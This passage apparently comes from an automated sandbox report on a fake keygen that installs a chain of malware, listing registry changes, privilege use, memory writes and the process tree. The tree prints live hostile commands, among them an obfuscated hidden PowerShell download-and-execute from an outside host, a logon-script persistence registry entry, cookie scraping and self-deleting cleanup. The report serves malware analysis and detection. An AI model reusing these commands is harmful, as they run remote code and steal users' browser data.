Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer Setup3310.tmp Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3700 PING.EXE 5836 PING.EXE 6920 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 152 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 158 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 341 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 348 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 508 setups.tmp 508 setups.tmp 3568 multitimer.exe 3568 multitimer.exe 3568 multitimer.exe 3568 multitimer.exe 3568 multitimer.exe 3568 multitimer.exe 3568 multitimer.exe 3568 multitimer.exe 3568 multitimer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4168 toolspab1.exe 4168 toolspab1.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 908 Setup.exe Token: SeCreateTokenPrivilege 2284 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2284 askinstall20.exe Token: SeLockMemoryPrivilege 2284 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2284 askinstall20.exe Token: SeMachineAccountPrivilege 2284 askinstall20.exe Token: SeTcbPrivilege 2284 askinstall20.exe Token: SeSecurityPrivilege 2284 askinstall20.exe Token: SeTakeOwnershipPrivilege 2284 askinstall20.exe Token: SeLoadDriverPrivilege 2284 askinstall20.exe Token: SeSystemProfilePrivilege 2284 askinstall20.exe Token: SeSystemtimePrivilege 2284 askinstall20.exe Token: SeProfSingleProcessPrivilege 2284 askinstall20.exe Token: SeIncBasePriorityPrivilege 2284 askinstall20.exe Token: SeCreatePagefilePrivilege 2284 askinstall20.exe Token: SeCreatePermanentPrivilege 2284 askinstall20.exe Token: SeBackupPrivilege 2284 askinstall20.exe Token: SeRestorePrivilege 2284 askinstall20.exe Token: SeShutdownPrivilege 2284 askinstall20.exe Token: SeDebugPrivilege 2284 askinstall20.exe Token: SeAuditPrivilege 2284 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2284 askinstall20.exe Token: SeChangeNotifyPrivilege 2284 askinstall20.exe Token: SeRemoteShutdownPrivilege 2284 askinstall20.exe Token: SeUndockPrivilege 2284 askinstall20.exe Token: SeSyncAgentPrivilege 2284 askinstall20.exe Token: SeEnableDelegationPrivilege 2284 askinstall20.exe Token: SeManageVolumePrivilege 2284 askinstall20.exe Token: SeImpersonatePrivilege 2284 askinstall20.exe Token: SeCreateGlobalPrivilege 2284 askinstall20.exe Token: 31 2284 askinstall20.exe Token: 32 2284 askinstall20.exe Token: 33 2284 askinstall20.exe Token: 34 2284 askinstall20.exe Token: 35 2284 askinstall20.exe Token: SeDebugPrivilege 3568 multitimer.exe Token: SeDebugPrivilege 3156 MicrosoftEdge.exe Token: SeDebugPrivilege 3156 MicrosoftEdge.exe Token: SeDebugPrivilege 3156 MicrosoftEdge.exe Token: SeDebugPrivilege 3156 MicrosoftEdge.exe Token: SeDebugPrivilege 4232 Setup3310.tmp Token: SeDebugPrivilege 4232 Setup3310.tmp Token: SeDebugPrivilege 4232 Setup3310.tmp Token: SeDebugPrivilege 4232 Setup3310.tmp Token: SeDebugPrivilege 4492 multitimer.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3328 setups.exe 508 setups.tmp 3156 MicrosoftEdge.exe 4168 MicrosoftEdgeCP.exe 4168 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 648 wrote to memory of 1012 648 Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe 78 PID 648 wrote to memory of 1012 648 Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe 78 PID 648 wrote to memory of 1012 648 Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe 78 PID 1012 wrote to memory of 3660 1012 cmd.exe 81 PID 1012 wrote to memory of 3660 1012 cmd.exe 81 PID 1012 wrote to memory of 3660 1012 cmd.exe 81 PID 1012 wrote to memory of 3640 1012 cmd.exe 82 PID 1012 wrote to memory of 3640 1012 cmd.exe 82 PID 1012 wrote to memory of 3640 1012 cmd.exe 82 PID 1012 wrote to memory of 1520 1012 cmd.exe 83 PID 1012 wrote to memory of 1520 1012 cmd.exe 83 PID 1012 wrote to memory of 1520 1012 cmd.exe 83 PID 1012 wrote to memory of 3628 1012 cmd.exe 84 PID 1012 wrote to memory of 3628 1012 cmd.exe 84 PID 1012 wrote to memory of 3628 1012 cmd.exe 84 PID 3660 wrote to memory of 1228 3660 keygen-pr.exe 85 PID 3660 wrote to memory of 1228 3660 keygen-pr.exe 85 PID 3660 wrote to memory of 1228 3660 keygen-pr.exe 85 PID 3628 wrote to memory of 908 3628 keygen-step-4.exe 86 PID 3628 wrote to memory of 908 3628 keygen-step-4.exe 86 PID 1520 wrote to memory of 3836 1520 keygen-step-3.exe 88 PID 1520 wrote to memory of 3836 1520 keygen-step-3.exe 88 PID 1520 wrote to memory of 3836 1520 keygen-step-3.exe 88 PID 1228 wrote to memory of 808 1228 key.exe 87 PID 1228 wrote to memory of 808 1228 key.exe 87 PID 1228 wrote to memory of 808 1228 key.exe 87 PID 3836 wrote to memory of 3700 3836 cmd.exe 90 PID 3836 wrote to memory of 3700 3836 cmd.exe 90 PID 3836 wrote to memory of 3700 3836 cmd.exe 90 PID 908 wrote to memory of 3568 908 Setup.exe 91 PID 908 wrote to memory of 3568 908 Setup.exe 91 PID 908 wrote to memory of 3328 908 Setup.exe 92 PID 908 wrote to memory of 3328 908 Setup.exe 92 PID 908 wrote to memory of 3328 908 Setup.exe 92 PID 3628 wrote to memory of 2284 3628 keygen-step-4.exe 93 PID 3628 wrote to memory of 2284 3628 keygen-step-4.exe 93 PID 3628 wrote to memory of 2284 3628 keygen-step-4.exe 93 PID 3328 wrote to memory of 508 3328 setups.exe 94 PID 3328 wrote to memory of 508 3328 setups.exe 94 PID 3328 wrote to memory of 508 3328 setups.exe 94 PID 3568 wrote to memory of 4392 3568 multitimer.exe 100 PID 3568 wrote to memory of 4392 3568 multitimer.exe 100 PID 4392 wrote to memory of 4492 4392 multitimer.exe 101 PID 4392 wrote to memory of 4492 4392 multitimer.exe 101 PID 4168 wrote to memory of 4232 4168 toolspab1.exe 238 PID 4168 wrote to memory of 4232 4168 toolspab1.exe 238 PID 4168 wrote to memory of 4232 4168 toolspab1.exe 238 PID 4168 wrote to memory of 4232 4168 toolspab1.exe 238 PID 4168 wrote to memory of 4232 4168 toolspab1.exe 238
Processes
-
C:\Users\Admin\AppData\Local\Temp\Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe"C:\Users\Admin\AppData\Local\Temp\Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Users\Admin\AppData\Local\Temp\4U7182TXSD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4U7182TXSD\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\4U7182TXSD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4U7182TXSD\multitimer.exe" 1 3.1617432444.60680f7c1a918 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\4U7182TXSD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4U7182TXSD\multitimer.exe" 2 3.1617432444.60680f7c1a9187⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
PID:4492 -
C:\Users\Admin\AppData\Local\Temp\mtmtv1kyxfy\q3dr02xuhog.exe"C:\Users\Admin\AppData\Local\Temp\mtmtv1kyxfy\q3dr02xuhog.exe" /VERYSILENT8⤵PID:4920
-
C:\Users\Admin\AppData\Local\Temp\is-P5HV2.tmp\q3dr02xuhog.tmp"C:\Users\Admin\AppData\Local\Temp\is-P5HV2.tmp\q3dr02xuhog.tmp" /SL5="$402EA,2592217,780800,C:\Users\Admin\AppData\Local\Temp\mtmtv1kyxfy\q3dr02xuhog.exe" /VERYSILENT9⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\is-3GRUH.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-3GRUH.tmp\winlthsth.exe"10⤵PID:5784
-
C:\Users\Admin\AppData\Local\Temp\ib7weANeu.exe"C:\Users\Admin\AppData\Local\Temp\ib7weANeu.exe"11⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\ib7weANeu.exe"C:\Users\Admin\AppData\Local\Temp\ib7weANeu.exe"12⤵PID:5760
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5516
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:1860
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5g1l3syph3a\vict.exe"C:\Users\Admin\AppData\Local\Temp\5g1l3syph3a\vict.exe" /VERYSILENT /id=5358⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\is-PHQS8.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-PHQS8.tmp\vict.tmp" /SL5="$60302,870426,780800,C:\Users\Admin\AppData\Local\Temp\5g1l3syph3a\vict.exe" /VERYSILENT /id=5359⤵PID:2608
-
C:\Users\Admin\AppData\Local\Temp\is-MD0NU.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-MD0NU.tmp\win1host.exe" 53510⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\j5UsLiGjk.exe"C:\Users\Admin\AppData\Local\Temp\j5UsLiGjk.exe"11⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\j5UsLiGjk.exe"C:\Users\Admin\AppData\Local\Temp\j5UsLiGjk.exe"12⤵PID:3764
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 154011⤵
- Program crash
PID:744
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iu10atf1mkx\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\iu10atf1mkx\KiffApp1.exe"8⤵PID:1080
-
-
C:\Users\Admin\AppData\Local\Temp\5sydk0rm14f\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\5sydk0rm14f\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\is-3S6AK.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-3S6AK.tmp\IBInstaller_97039.tmp" /SL5="$103E4,14574851,721408,C:\Users\Admin\AppData\Local\Temp\5sydk0rm14f\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-EDU8P.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5268
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-EDU8P.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5500
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:7604
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:7616
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:7596
-
-
C:\Users\Admin\AppData\Local\Temp\is-EDU8P.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-EDU8P.tmp\{app}\chrome_proxy.exe"10⤵PID:2176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3v431z3v5i3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3v431z3v5i3\Setup3310.exe" /Verysilent /subid=5778⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\is-KJ5IN.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KJ5IN.tmp\Setup3310.tmp" /SL5="$203E6,138429,56832,C:\Users\Admin\AppData\Local\Temp\3v431z3v5i3\Setup3310.exe" /Verysilent /subid=5779⤵PID:3132
-
C:\Users\Admin\AppData\Local\Temp\is-S0FCM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-S0FCM.tmp\Setup.exe" /Verysilent10⤵PID:6112
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:3792
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5584
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:6936
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 94812⤵
- Program crash
PID:4296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 100412⤵
- Program crash
PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 101612⤵
- Program crash
PID:7144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 114812⤵
- Program crash
PID:4200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 118812⤵
- Program crash
PID:6464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 124012⤵
- Program crash
PID:4632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 153612⤵
- Program crash
PID:4140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 156012⤵
- Program crash
PID:4300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 168812⤵
- Program crash
PID:4008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 172012⤵
- Program crash
PID:6068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 177212⤵
- Program crash
PID:4336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 180412⤵
- Program crash
PID:5824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 176812⤵
- Program crash
PID:6824
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:3956
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\is-O5QE5.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-O5QE5.tmp\LabPicV3.tmp" /SL5="$2035A,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\is-DKH46.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-DKH46.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:6812
-
C:\Users\Admin\AppData\Local\Temp\LBYWOEIQGN\prolab.exe"C:\Users\Admin\AppData\Local\Temp\LBYWOEIQGN\prolab.exe" /VERYSILENT14⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\is-4N0SB.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-4N0SB.tmp\prolab.tmp" /SL5="$504C2,575243,216576,C:\Users\Admin\AppData\Local\Temp\LBYWOEIQGN\prolab.exe" /VERYSILENT15⤵PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\31-c3756-4dd-626b7-b98fb47573dc1\Wysijotaeni.exe"C:\Users\Admin\AppData\Local\Temp\31-c3756-4dd-626b7-b98fb47573dc1\Wysijotaeni.exe"14⤵PID:6012
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 247615⤵PID:7932
-
-
-
C:\Users\Admin\AppData\Local\Temp\6d-ffd3c-13c-6559d-d67a261293577\Tisaeshocoju.exe"C:\Users\Admin\AppData\Local\Temp\6d-ffd3c-13c-6559d-d67a261293577\Tisaeshocoju.exe"14⤵PID:6260
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d21vrcrq.41d\md6_6ydj.exe & exit15⤵PID:492
-
C:\Users\Admin\AppData\Local\Temp\d21vrcrq.41d\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\d21vrcrq.41d\md6_6ydj.exe16⤵PID:5920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ncidp451.3jl\askinstall31.exe & exit15⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\ncidp451.3jl\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ncidp451.3jl\askinstall31.exe16⤵PID:4848
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:2164
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xdtskd5e.a4k\toolspab1.exe & exit15⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\xdtskd5e.a4k\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xdtskd5e.a4k\toolspab1.exe16⤵PID:812
-
C:\Users\Admin\AppData\Local\Temp\xdtskd5e.a4k\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xdtskd5e.a4k\toolspab1.exe17⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4168
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:184
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:6568
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:7120
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\is-0LJ0B.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-0LJ0B.tmp\lylal220.tmp" /SL5="$20352,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\is-U5BOD.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-U5BOD.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:6944
-
C:\Program Files\Google\IVAAASFWJF\irecord.exe"C:\Program Files\Google\IVAAASFWJF\irecord.exe" /VERYSILENT14⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\is-C3H6F.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-C3H6F.tmp\irecord.tmp" /SL5="$2028C,6265333,408064,C:\Program Files\Google\IVAAASFWJF\irecord.exe" /VERYSILENT15⤵PID:6932
-
-
-
C:\Users\Admin\AppData\Local\Temp\fe-c0cb0-e6f-293a5-fd16da5053cd4\Kylynebaeha.exe"C:\Users\Admin\AppData\Local\Temp\fe-c0cb0-e6f-293a5-fd16da5053cd4\Kylynebaeha.exe"14⤵PID:3608
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 78815⤵PID:7288
-
-
-
C:\Users\Admin\AppData\Local\Temp\9d-8b627-c28-fadb8-c8efc179550ee\Kymuqugefe.exe"C:\Users\Admin\AppData\Local\Temp\9d-8b627-c28-fadb8-c8efc179550ee\Kymuqugefe.exe"14⤵PID:4100
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:5840
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:6288
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:6504
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:2592
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"11⤵PID:5832
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6596
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5428
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"11⤵PID:2136
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵PID:6176
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"13⤵PID:4112
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:6672
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui14⤵PID:4304
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵PID:2192
